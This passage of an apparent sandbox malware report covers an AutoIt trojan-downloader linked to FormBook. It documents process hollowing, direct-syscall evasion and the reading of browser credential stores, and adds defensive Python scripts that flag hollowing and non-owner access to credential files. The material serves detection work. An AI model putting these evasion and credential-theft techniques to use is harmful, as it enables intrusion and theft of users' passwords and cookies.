Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038BC912 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03828918 mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038B892A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038C892B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038B0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03904940 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03856962 mov eax, dword ptr fs:[00000030h] (3 identical rows)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0387096E mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038BC97C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03830887 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038BC89D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0385E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039008C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038FA8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038BC810 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h] (3 identical rows)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03852835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008AA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008AA364 SetUnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Evidence behind the evasion signatures: native calls issued from inside the injected rULxYvbAFLatPN.exe image (the "Direct from" value is the address the call was issued from, which is how the sandbox recognises direct and indirect syscalls that never pass through the user-mode API stubs EDR hooks); execute+read+write sections mapped from the sample into svchost.exe, from svchost.exe into rULxYvbAFLatPN.exe and makecab.exe, and from makecab.exe into firefox.exe; a thread-context write and a queued APC from makecab.exe; and a svchost.exe started by the sample with the sample's own command line, the usual trace of process hollowing.

Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtOpenKeyEx: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtQueryValueKey: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\makecab.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: NULL target: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe protection: read write
Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: NULL target: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\makecab.exe | Thread register set: target process: 7772
Source: C:\Windows\SysWOW64\makecab.exe | Thread APC queued: target process: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: A3A008
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008D8C93 LogonUserW
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_00883B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_00884A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008E4EC9 mouse_event
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe"
Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | Process created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\SysWOW64\makecab.exe"
Source: C:\Windows\SysWOW64\makecab.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008E4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, rULxYvbAFLatPN.exe, 00000005.00000002.4100251548.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000000.1906158257.00000000010D1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: rULxYvbAFLatPN.exe, 00000005.00000002.4100251548.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000000.1906158257.00000000010D1000.00000002.00000001.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100424916.0000000000E70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: rULxYvbAFLatPN.exe, 00000005.00000002.4100251548.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000000.1906158257.00000000010D1000.00000002.00000001.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100424916.0000000000E70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: rULxYvbAFLatPN.exe, 00000005.00000002.4100251548.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000000.1906158257.00000000010D1000.00000002.00000001.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100424916.0000000000E70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008A886B cpuid
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008B50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008C2230 GetUserNameW
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008B418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_00884AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
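The "Section loaded" and "Process created" rows in this section describe a hollowing chain: the sample maps an execute/read/write section into a svchost.exe it started with its own command line, svchost.exe does the same into rULxYvbAFLatPN.exe and makecab.exe, and makecab.exe in turn writes into firefox.exe. The Python script below is an added example (not part of the Joe Sandbox report and not vendor tooling) that parses those rows (copied here as constructed input, with a " | " separator between source process and event), rebuilds the injector-to-target tree, and flags the three indicators a detection engineer would alert on: an RWX cross-process mapping, a svchost.exe whose parent is not services.exe and whose command line names a different binary, and a browser launched by a system utility. The LOLBINS and BROWSERS sets are the editor's assumptions, not values from the report.

```python
"""Rebuild the injection chain from Joe Sandbox behaviour rows and flag
process-hollowing indicators.  Added example, not part of the report."""
import re

# Constructed input: rows copied from this report, ' | ' separator added.
REPORT_ROWS = [
    r'Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write',
    r'Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe protection: execute and read and write',
    r'Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\makecab.exe protection: execute and read and write',
    r'Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: NULL target: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe protection: read write',
    r'Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write',
    r'Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe"',
    r'Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | Process created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\SysWOW64\makecab.exe"',
    r'Source: C:\Windows\SysWOW64\makecab.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"',
]

SECTION_RE = re.compile(r'^Source: (?P<src>.+?) \| Section loaded: NULL target: (?P<dst>.+?) protection: (?P<prot>.+)$')
PROCESS_RE = re.compile(r'^Source: (?P<parent>.+?) \| Process created: (?P<image>.+?) "(?P<cmd>.+)"$')

# Assumption: signed Microsoft utilities that have no business spawning a browser.
LOLBINS = {'makecab.exe', 'svchost.exe', 'regsvr32.exe', 'rundll32.exe'}
BROWSERS = {'firefox.exe', 'chrome.exe', 'msedge.exe'}


def basename(path):
    """Lower-cased file name, so 'Firefox.exe' compares equal to 'firefox.exe'."""
    return path.rsplit('\\', 1)[-1].lower()


def parse_rows(rows):
    sections, procs = [], []
    for row in rows:
        m = SECTION_RE.match(row)
        if m:
            sections.append(m.groupdict())
            continue
        m = PROCESS_RE.match(row)
        if m:
            procs.append(m.groupdict())
    return sections, procs


def rwx_cross_process(sections):
    """Sections mapped into another process with execute+write protection."""
    return [(basename(s['src']), basename(s['dst'])) for s in sections
            if s['src'] != s['dst'] and 'execute' in s['prot'] and 'write' in s['prot']]


def hollowing_indicators(procs):
    findings = []
    for p in procs:
        parent, image = basename(p['parent']), basename(p['image'])
        # Hollowed svchost.exe: the image on disk is svchost.exe but the
        # command line still names the sample that created it.
        if basename(p['cmd']) != image:
            findings.append((image, 'image/command-line mismatch'))
        if image == 'svchost.exe' and parent != 'services.exe':
            findings.append((image, 'svchost.exe parent is not services.exe'))
        if image in BROWSERS and parent in LOLBINS:
            findings.append((image, f'browser launched by {parent}'))
    return findings


def injection_tree(sections, procs):
    """Edges (injector -> target), depth-first from the process nobody injected into."""
    edges, targets = {}, set()
    pairs = [(s['src'], s['dst']) for s in sections] + [(p['parent'], p['image']) for p in procs]
    for src, dst in pairs:
        src, dst = basename(src), basename(dst)
        if dst not in edges.setdefault(src, []):
            edges[src].append(dst)
        targets.add(dst)
    order, seen = [], set()

    def walk(node):
        seen.add(node)
        for child in edges.get(node, []):
            order.append((node, child))
            if child not in seen:
                walk(child)

    for root in [n for n in edges if n not in targets]:
        walk(root)
    return order


def analyse(rows):
    sections, procs = parse_rows(rows)
    return {'rwx': rwx_cross_process(sections),
            'tree': injection_tree(sections, procs),
            'findings': hollowing_indicators(procs)}


if __name__ == '__main__':
    result = analyse(REPORT_ROWS)
    for src, dst in result['tree']:
        print(f'{src} -> {dst}')
    for image, why in result['findings']:
        print(f'[!] {image}: {why}')
```

On the report's rows the tree comes out as sample -> svchost.exe -> rULxYvbAFLatPN.exe -> makecab.exe -> firefox.exe (with the second svchost.exe -> makecab.exe mapping as a side edge), four of the five mappings are RWX, and the hollowed svchost.exe trips both the command-line and the parent check. The same three checks translate directly to Sysmon event ID 1 (parent image, image, command line) and event ID 8/10 data.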

Stealing of Sensitive Information

The FormBook Yara rule matches the unpacked svchost.exe image (process 1) and memory regions of processes 1, 5, 6 and 7 (5 and 7 are the two rULxYvbAFLatPN.exe instances). The file and registry accesses come from makecab.exe, a signed Microsoft cabinet utility with no legitimate reason to read user profiles: it opens the Chrome and Edge Cookies, Login Data, Web Data and Local State files (Local State holds the DPAPI-wrapped key that protects the saved passwords) and the Outlook MAPI profile key under Windows Messaging Subsystem\Profiles, where stored mail account settings live. The WIN_* strings are the AutoIt runtime's @OSVersion constants embedded in the outer binary.

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\makecab.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Binary or memory string: WIN_81
Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Binary or memory string: WIN_XP
Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Binary or memory string: WIN_XPe
Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Binary or memory string: WIN_VISTA
Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Binary or memory string: WIN_7
Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Binary or memory string: WIN_8
Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
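The "File opened" and "Key opened" rows above are the harvesting step: makecab.exe, not a browser or mail client, reads the Chrome and Edge credential stores and the Outlook MAPI profile key. The Python script below is an added example (not part of the Joe Sandbox report and not vendor tooling) that turns that observation into a rule: it parses those rows (copied here as constructed input with a " | " separator, plus one constructed benign row in which chrome.exe opens its own Login Data), flags any process other than the owning application that opens a credential store, and summarises per process which stores were touched. The owner mapping (chrome.exe, msedge.exe, outlook.exe) and the store list are the editor's assumptions.

```python
"""Flag non-owner processes that open browser credential stores or the
Outlook MAPI profile key.  Added example, not part of the report."""
import re

# Constructed input: rows copied from this report (' | ' separator added)
# plus one benign row so the allow-list is exercised.
ACCESS_ROWS = [
    r'Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies',
    r'Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies',
    r'Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies',
    r'Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data',
    r'Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data',
    r'Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State',
    r'Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State',
    r'Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data',
    # The report's key path ends in a backslash, which a raw literal cannot; appended separately.
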